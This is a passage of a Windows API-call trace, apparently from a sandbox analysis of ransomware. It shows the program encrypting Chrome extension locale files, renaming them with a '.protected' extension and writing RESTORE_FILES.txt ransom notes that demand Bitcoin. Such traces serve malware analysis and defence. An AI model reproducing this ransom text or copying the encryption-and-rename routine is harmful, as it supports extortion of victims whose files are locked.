Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected") returned 165 [0080.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\messages.json.protected")) returned 1 [0080.638] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.638] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.638] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\RESTORE_FILES.txt") returned 159 [0080.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\no\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.639] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.639] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.640] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.640] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.640] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.640] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.640] CloseHandle (hObject=0x164) returned 1 [0080.640] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Windows") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Program Files") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="Program Files (x86)") returned -1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="$Recycle.bin") returned 1 [0080.640] lstrcmpiW (lpString1="pl", lpString2="System Volume Information") returned -1 [0080.640] wnsprintfW 
(in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl") returned 141 [0080.640] lstrcmpW (lpString1="pl", lpString2=".") returned 1 [0080.640] lstrcmpW (lpString1="pl", lpString2="..") returned 1 [0080.640] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*") returned 143 [0080.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.641] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.641] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.641] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.641] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\.") returned 143 [0080.642] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.642] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.642] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.642] 
lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.642] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.642] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\..") returned 144 [0080.642] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.642] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.642] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.642] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.642] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.642] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.642] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.642] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.642] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.643] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json") returned 155 [0080.643] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.643] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb4, lpOverlapped=0x0) returned 1 [0080.644] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb4, lpOverlapped=0x0) returned 1 [0080.644] SetFilePointerEx (in: hFile=0x168, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.644] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.644] CloseHandle (hObject=0x168) returned 1 [0080.644] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected") returned 165 [0080.644] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\messages.json.protected")) returned 1 [0080.645] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.645] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.645] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\RESTORE_FILES.txt") returned 159 [0080.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.645] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.645] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.646] lstrlenA (lpString="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") returned 684 [0080.646] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.646] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.646] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0080.646] CloseHandle (hObject=0x164) returned 1 [0080.646] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Windows") returned -1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="Program Files (x86)") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="$Recycle.bin") returned 1 [0080.646] lstrcmpiW (lpString1="pt_BR", lpString2="System Volume Information") returned -1 [0080.646] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR") returned 144 [0080.646] lstrcmpW (lpString1="pt_BR", lpString2=".") returned 1 [0080.647] lstrcmpW (lpString1="pt_BR", lpString2="..") returned 1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*") returned 146 [0080.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\.") returned 146 [0080.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.647] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\..") returned 147 [0080.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.647] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.647] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.647] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.647] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.647] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.647] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.647] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.647] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.648] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json") returned 158 [0080.648] StrStrW 
(lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.648] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.649] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff45, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xbb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xbb, lpOverlapped=0x0) returned 1 [0080.649] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.649] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.649] CloseHandle (hObject=0x168) returned 1 [0080.649] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.protected") returned 168 [0080.649] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 
data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_BR\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pt_br\\messages.json.protected")) returned 1 [0080.650] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.650] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.650] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: 